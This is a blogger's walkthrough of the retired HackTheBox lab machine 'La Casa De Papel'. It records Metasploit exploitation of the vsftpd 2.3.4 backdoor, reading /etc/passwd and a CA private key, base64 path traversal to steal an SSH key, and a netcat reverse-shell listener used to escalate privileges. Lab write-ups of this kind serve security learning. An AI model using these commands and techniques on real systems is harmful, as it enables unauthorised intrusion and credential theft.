HTB – La Casa De Papel

Alright, here we go!

It’s Wednesday night. I have tonight and tomorrow, then this box is being retired on Saturday!

I’ve done some tweeting, tried to make it a group activity! (https://twitter.com/Yekki_1/status/1154075821759500288)

However, for now, it’s just me!

First off, what the heck is La Casa De Papel? Google tells me  it’s a Spanish heist TV show. Available on netflix!

Once this box is done, that is getting a watch!

First off, let’s run an nmap:

nmap -sC -sV -T4 -oA nmap/nmap 10.10.10.131

The results are in and we have 4 ports open!

Both 80 and 443 are web servers running nodeJS.

Let’s start with port 80:

There is a QR code. Let’s try scanning it!

As I thought “token couldn’t be read!”. So it’s not a legit QR code. Let’s download it and see if strings brings back anything

Nothing that makes sense yet. Let’s save that for later!

Within the page code, we do get some bits for the QR code:

}</style></head><body><div><form method="POST"><input type="image" src="/qrcode?qrurl=otpauth%3A%2F%2Fhotp%2FToken%3Fsecret%3DHB4HUKBMLN2XK22WKNJXOJDWKU5GCSZV%26algorithm%3DSHA1" readonly="readonly" onclick="return false"><input name="secret" type="hidden" value="HB4HUKBMLN2XK22WKNJXOJDWKU5GCSZV"><input name="token" type="text" placeholder="ONE PASSWORD" autocomplete="off"><a target="_blank" href="https://support.google.com/accounts/answer/1066447?co=GENIE.Platform%3DAndroid&amp;hl=en&amp;oco=0">Install Google Authenticator</a><input name="email" type="email" placeholder="E-MAIL" autocomplete="off"><button>GET FREE TRIAL</button></form></div></body></html>

The token secret might be interesting

Let’s get a gobuster running while we carry on poking about!

gobuster -u http://10.10.10.131 -w /usr/share/wordlists/rockyou.txt

So port 443, what wonders do you behold?

A very specific user added certificate error:

Looking at the certificate itself, it looks like it’s only valid for lacasadepapel.htb

Off to our hosts file we go!

editing /etc/hosts and adding in:

10.10.10.131 lacasadepapel.htb

Going back to the website, via the new DNS it still brings back the same error.

Let’s get a gobuster going here too! This is slightly harder as we get the error

So we need the -k flag to skip ssl certificate verification

gobuster -u https://lacasadepapel.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

We get a result that a wildcard response is found, specify the -fw switch to force the process. Doing this just brings back every domain as a 302.

Rather than ignoring just 302s, why don’t we accept only status 200s.

gobuster -u https://lacasadepapel.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -fw -s 200

That’s now happily running through.

While they are running, shall we look closer at the FTP service. Does that allow anonymous logins?

root@oblivion:~/Documents/htb/casa# ftp 10.10.10.131
Connected to 10.10.10.131.
220 (vsFTPd 2.3.4)
Name (10.10.10.131:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> exit
221 Goodbye.

It does not!

My feeling is we need a username and password from port 80, to get a certificate from port 21 to view port 443.

While we are waiting for the gobusters to finish. let’s run a full port scan.

Nothing on any of them.

So I guess we need to get a cert somehow. Can we create our own cert and get that to be used?

I wouldn’t say so, as any certificate that we create won’t be signed by the certificate authority, so won’t have that chain of trust resulting in it not working.

Instead looking at the headers that are returned in burp, for both port 80 & 443 we see what we got told about in the nmap scan:

HTTP/1.1 401 Unauthorized 
X-Powered-By: Express 
Content-Type: text/html; charset=utf-8 
Content-Length: 931 
ETag: W/"3a3-ltZ9andWBAdO1mJpoSYlrCWcCP0" 
Date: Wed, 24 Jul 2019 18:09:17 GMT 
Connection: close

Both pages are being powered by Express, which is a NodeJS module.

Looking around the internet, we find this and this . These indicate that there is a way to get RCE from anything running Express.

Let’s give them a look through and see what we would need to do!

Going through those steps just returns nothing. The QR code is the only valid URL with a “?” to start on and that doesn’t work

I’ve had a break and still no idea. A quick look on the forums says that the initial foothold might be through the FTP server.

We know it’s not anonymous login, so let’s take a deeper look using:

https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b

The metasploit module of ftp_version looks interesting. Let’s set that up

msfconsole

use auxiliary/scanner/ftp/ftp_version

show options

Set the RHOSTS

set RHOSTS 10.10.10.131

run

We get a banner back with some interesting information.

Annoyingly, looking back at our nmap scan we started with, we had that information!

So a searchsploit for vsftpd gives us some results.

The last one is what we want, command execution! So let’s boot metasploit backup and take a look:

search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show payloads

set PAYLOAD cmd/unix/interact

run

Running this we get a sucessful message. We run it again and get a more interesting message

Well we saw this port earlier on our full nmap scan but it was filtered. Looks like we might have just opened it up.

What this module is doing is entering a username with a 🙂 in it. This opens the backdoor.

Trying with a web browser doesn’t load anything.

Giving it a go with FTP however!

Running whoami / pwd / ls etc all bring back errors. A quick help and we get:

Having a poke about with help from a good friend!

We manage to do an ls giving us the variables available

Tokyo looks pretty exciting. Let’s see if we can dump that out!

show $tokyo

So we know there is stuff there,

Looking at this, can we run any php code?

echo "test"

We get a result of test, so we can run php code in this shell.

Looking at phpinfo() we find out that a whole bunch of useful stuff is disabled:

So we can’t run shell_exec or any of that juicy stuff. However we must be able to read files. The php code above gets file contents, so why can’t we?

file_get_contents('/etc/passwd')

So, shall we see what the code was looking at earlier

file_get_contents('/home/nairobi/ca.key')

We have a ca key!

Now that we have this, we can copy it across to our local box and save it was rootca.key Then we need to make a new certificate!

Before that, lets take a quick look to see what else is around

scandir('/home/nairobi')

No user.txt sadly!

However we can do:

scandir('/home')

After a bit of poking around, the user.txt file is in /home/berlin but sadly we don’t have permission for that

We can use openssl for this:

openssl req -new -key rootca.key -out lacasadepapel.htb.csr

Questions will be asked, so let’s look at the certificate on the website to get the answers that we can.

So we now have a csr. Hopefully with this and the key we can create a client certificate.

Looking round the net, I think we might have a command:

openssl x509 -req -days 365 -in lacasadepapel.htb.csr -signkey rootca.key -sha256 -out lacasadepapel.crt

That ran through properly, we now have bingo.crt.

Let’s add this cert to our cert store and see if we can access the website on port 443.

I think my bingo was too keen! Far too keen!

So the error we are getting is “peer certificate issuer is not recongized”

After some more playing, we get issues that it’s a self-signed certificate and also it looks like the browsers aren’t using my certificate, they are using the hosts ones.

What I forgot, was to create a client certificate, we need both the key and the crt in the same file, then to create that into a .p12

So using nano we put the files together. With the ca.key on the top then the created crt below.

openssl pkcs12 -export -in ca.txt -out lacasadepapel.p12

This then creates a p12 certificate, which can be added to your local certificates in firefox.

Loading the website then asks for the cert, give it that one and boom

Looking around, we have seasons 1 and 2 and each have an avi file.

Each of the avi files had a URL of something like:

https://lacasadepapel.htb/file/U0VBU09OLTIvMDEuYXZp

This to me looks suspect, why wouldn’t it just be the episode number?

Putting that through a base64 decoder we get:

SEASON-2/09.avi

Useful, also trying the change the path to SEASON-2 from:

https://lacasadepapel.htb/?path=SEASON-2

to

https://lacasadepapel.htb/?path=../../../../../../../../etc/passwd

Gives us an error:

Error: ENOTDIR: not a directory, scandir '/home/berlin/downloads/../../../../../../etc/passwd/'
at Object.fs.readdirSync (fs.js:904:18)
at /home/berlin/server.js:10:20
at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)
at next (/home/berlin/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/berlin/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/berlin/node_modules/express/lib/router/layer.js:95:5)
at /home/berlin/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/berlin/node_modules/express/lib/router/index.js:335:12)
at next (/home/berlin/node_modules/express/lib/router/index.js:275:10)
at expressInit (/home/berlin/node_modules/express/lib/middleware/init.js:40:5

So it looks like it’s looking for items in downloads. Now from earlier we know the user.txt is in /home/berlin so can we base64 ../user.txt
Which gives us

Li4vdXNlci50eHQ=

Trying this out we get:

https://lacasadepapel.htb/file/Li4vdXNlci50eHQ=

Which downloads a file, called user.txt

Boom, we have the user flag!

I am so very glad we finally got here!

Now, to get access to the box, I really hope this user has ssh keys!

Let’s go back to the Psy Shell and see what’s in the Berlin home directory to see what could be useful

There is a .ssh folder, let’s see if authorized_keys is there

That might be useful, although we don’t currently have the public key. Also the comment is odd:

thek@Thekmac.local

How odd

Another file we know is there, is server.js let’s take a look at this, it has a very interesting line:

This means that we might be able to look at folders! Let’s try it

https://lacasadepapel.htb/?path=../

Yesssss! So we can now enumerate the folders and files! This is ace!

Looking in the .ssh folder we have:

authorized_keys
id_rsa
id_rsa.pub
known_hosts

Let’s grab all of these.

So id_rsa is a private key with the comment of berlin@lacasadepapel.htb

The id_rsa.pub is the public key.

Let’s try the private key

ssh -i id_rsa berlin@10.10.10.131

We get asked for a password, hmm.

Might as well try all users before we look into how to get the public key onto the machine.

OMG, boom! Ok that was unexpected!

We have a shell, as professor.

So never trust the comments on CTFs!

The shell is odd though. Looking at /etc/passwd it’s an “ash” shell.

I get excited by getting shells, some people on the other hand, just enjoy mocking!

Let’s try and upgrade that to bash!

python -c 'import pty;pty.spawn("/bin/bash")'

This for the first time in my life, didn’t do anything! How odd!

Looking in /etc/ there is os-release, we are running:

NAME="Alpine Linux"
ID=alpine
VERSION_ID=3.8.1
PRETTY_NAME="Alpine Linux v3.8"
HOME_URL="http://alpinelinux.org"
BUG_REPORT_URL="http://bugs.alpinelinux.org"

Never heard of it. the website claims its “a security-oriented, lightweight Linux distribution”

This version was released on 11-09-2018 so not too old but not fully new either.

As always though, let’s get LinEnum.sh on it and see what we find.

Copying it across from my local box using a SimpleHTTPServer

python -m SimpleHTTPServer 9000

wget 10.10.14.33:9000/LinEnum.sh -O /tmp/LinEnum.sh

Let’s run that and see what happens.

The permissions on the home directories are odd:

The user of nobody owns 2 of the home directories. Strange

There is also an interesting process running

nobody is running it, but in the professor home directory.

In the home directory we have:

lacasadepapel [~]$ ls -al
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 20:56 .
drwxr-xr-x 7 root root 4096 Feb 16 18:06 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 21:36 .ssh
-rw-r--r-- 1 root root 88 Jan 29 01:25 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 01:24 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 01:31 node_modules

 

So memcached.ini is owned by root but I can read it:

[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Whereas memcached.js group is nobody and I can’t read that one.

So I guess I need to try and become nobody to success here.

I can’t run sudo -u as I don’t know the passwords. Let’s see if we can see what’s going on here using pspy

pspy64s just wouldn’t run, so I went back to the github page and downloaded the 32bit one which ran.

Running it didn’t show a lot that we hadn’t kinda guessed:

The UID of 65534 is nobody. So nobody is running that command pretty often.

So what is this doing, what is /usr/bin/node?

It looks like that’s the nodeJS service. And it’s running memcached.js which makes sense. This will all be via the .ini file, so let’s take a look at that.

We can’t edit it, so that’s out straight away. We get permission denied.

It seems like the right method though. Everything else is hanging off node here. Let’s take a look at that

If we do /usr/bin/node we get a nodejs shell. A quick google found out how to write a file:

const fs = require('fs');
fs.writeFile("/tmp/test", "Hey there!", function(err) {
if(err) {
return console.log(err);
}

console.log("The file was saved!");
});

Trying this works and creates a file called test which when read says “Hey there!”.

So, can we over-write the memcached.js file? Let’s create a basic file that should echo something to temp:

const fs = require('fs');
fs.writeFile("/home/professor/memcached.js", "echo 'Winning!' > /tmp/wins", function(err) {
if(err) {
return console.log(err);
}

console.log("The file was saved!");
});

Bugger!

 

Looking again at the permissions on /home/ we notice that the professor directory has the permissions of

drwxr-sr-x

The s for group is odd. Normally it would be x for execute. So what is the “s” in Linux permissions?

This is the SUID, so a binary runs as the owner not as your user.

As an off chance of reading a forum explaining it here: https://www.linuxquestions.org/questions/linux-newbie-8/what-is-s-instead-of-x-in-the-file-permission-when-i-look-at-usr-bin-chsh-223386/ it said we might be able to use rm with the s permission

Looking at that, I ran rm memcached.js and guess what! It’s gone!

So let’s create a file that creates a file in temp

SO let’s wait for that job to run again and see if the file gets created. If it does, we can then put in some sort of shell command and hopefully get some priv-esc!

That job didn’t appear to run again, I’m not sure why, but the file never got created.

I have sadly, run out of time and awakeness. So this is a box that will remain unrooted.

I’m sure i’ll see on Saturday just how very close I was to this!

 

*********Post Retirement**********

So the box got retired and unfortunately I didn’t manage to root it in time!

Rather than prodding around, I watched ippsecs video and I was so very close!

The fact that we changed the .js file not the .ini was the issue. We also would have had to have kept the format, so we wanted to make a new memcached.ini with something like:

We set up a listener on our local box

nc -nvlp 9002

Then we wait for the connection back! Nothing happens. So the command isn’t being run.

We instead need to tell it what bash to use, so we add in a few words:

After only a couple of minutes, we get a shell back!

So we were very close. We got the idea of the directory permissions, just didn’t quite push it over that line. I think we would have got there.

What annoys me slightly is watching the pspy and not seeing the cronjob being run, I’m not sure what happened there!

All in all, a fun 2 day box! The SSL cert was frustrating due to my own failures but other than that  I really enjoyed it. I especially like the easy but very important webapp directory listing and reading file contents.

 

Leave a Reply

Your email address will not be published. Required fields are marked *